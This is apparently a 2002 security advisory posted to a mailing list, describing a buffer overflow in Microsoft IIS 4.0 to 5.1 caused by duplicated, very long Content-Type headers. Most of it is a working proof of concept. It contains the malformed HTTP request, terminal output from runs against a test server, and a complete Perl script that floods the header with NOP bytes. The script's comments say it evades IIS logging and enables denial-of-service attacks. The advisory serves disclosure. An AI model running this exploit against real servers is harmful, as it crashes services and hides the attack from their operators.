IIS Vulnerability Content-Type overflow

["at4r" <at4r () hotmail com>]

------------------------ 3wdesign.es security ------------------------
Advisory: IIS Vulnerability Content-Type overflow
discovered:  November 26, 2002
Platforms:  windows NT/2000/xp ( iis 4.0 iis 5.0 iis 5.1 ... ¿ 6.0 ? )
Vendors:   Microsoft Corporation (http://www.microsoft.com)
Andrés Tarascó ( at4r at 3wdesign.es ) discovered this vulnerability
------------------------ 3wdesign.es security ------------------------


while testing a few days ago how to reproduce the lastest mdac rds
vulnerability i found that a specially malformed http request to an IIS
Webserver can allow a buffer overflow.
The bug is in the Content-Type string and seems that is not the same
vulnerability founded in mdac RDS few days ago by foundstone because IIS
webservers with all security patches are vulnerable to this.

GET /foo HTTP/1.0
Host: hax
Content-Type: application/x-www-form-urlencoded
Content-Length: 56
Accept-Language: en
Content-Type: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...about
32700....]


When lenght of both content-type strings is ~> 32768 there is an overflow,
and requests are not being logged by IIS.

here is an example of this bug:

aT4r@server:~$ ./test.pl 192.168.0.69 80 32684

HTTP/1.1 500 Server Error
Server: Microsoft-IIS/5.0
Date: Tue, 26 Nov 2002 22:21:56 GMT
Content-Type: text/html
Content-Length: 119

<html><head><title>Error</title></head><body>Not enough storage is available
to complete this operation. </body></html>
aT4r@server:~$


aT4r@server:~$ ./test.pl 192.168.0.69 80 150000

HTTP/1.1 500 Server Error
Server: Microsoft-IIS/5.0
Date: Tue, 26 Nov 2002 22:22:30 GMT
Content-Type: text/html
Content-Length: 98

<html><head><title>Bad Request</title></head><body><h1>HTTP/1.1 400 Bad
Request</h1></body></html>
aT4r@server:~$


aT4r@server:~$ ./test.pl 192.168.0.69 80 300000
aT4r@server:~$



i have an easy perl script to test this:

[test.pl]--------------------------
#!/usr/bin/perl -W
# Its possible to send requests to an IIS webserver without being logged.
# This allow an attacker to launch a DoS attack against the server with
# multiple requests having a big CPU Consume.
# tested under IIS 4.0,  IIS 5.0 and 5.1
# Email: at4r AT 3wdesign.es
# Discovered: 26 november 2002
# Greetings to my friends: Tarako, Drakar, |tyr| , [back] , croulder, ppp0 ,
Contraste.

require IO::Socket;

if ($#ARGV<1)
{
 print "\n use: ./test.pl IP Port N!! \n\n";
 exit;
}

printf"\n ----------------------------------------------------\n";
print "|                IIS Testing                         |\n";
printf" ----------------------------------------------------\n\n";


$cabecera = "GET /foo HTTP/1.0\n".
   "Host: hax\n".
   "Content-Type: application/x-www-form-urlencoded\n".
   "Content-Length: 56\n".
   "Accept-Language: en\n";

$sock = new IO::Socket::INET (PeerAddr => "$ARGV[0]",
                               PeerPort => "$ARGV[1]",
                               Proto    => "tcp");

die "\nCould not connect to $ARGV[0] : $!\n" unless $sock;

print $sock "${cabecera}";
$bof = `perl -e "print '\x90' x $ARGV[2]"`;
print $sock "Content-Type: ${bof}\n\r\n\r\n";

while (<$sock>) {
  print "${_}";
 }

printf "\n";

--------------------------[test.pl]


I dont Know if all webservers are vulnerable to this and if its possible to
execute code, so please take a look.
vendor was contacted but i got no answer.

if you got more information please send me an email to: at4r at 3wdesign.es.